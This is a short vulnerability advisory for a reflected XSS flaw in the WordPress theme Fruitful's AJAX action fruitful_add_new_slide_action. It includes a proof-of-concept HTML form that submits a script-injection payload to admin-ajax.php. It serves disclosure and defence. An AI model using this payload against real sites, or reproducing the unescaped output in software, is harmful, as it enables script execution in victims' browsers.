Fruitful [Reflected XSS]

Description

Theme Fruitful is vulnerable to Reflected XSS attack by using the AJAX action fruitful_add_new_slide_action. This action outputs the contents of variable $_POST['data'] without proper escaping, thus allowing to an attacker to form a malicious request and execute JS code in the victims browser.

Because this action is a privileged one, it takes a registered and loged user to work.

PoC

Use a logged in user to submit this form

<form action="http://example.com/wp-admin/admin-ajax.php" method="post">
    <input type="hidden" name="action" value="fruitful_add_new_slide_action">
    <input type="hidden" name="data" value='"><script>alert(1)</script> <!--'>
    <input type="submit" value="Click Me!">
</form>

INFO
GKxtL3WcoJHtnKZtqTuuqPOiMvOwqKWco3AcqUxX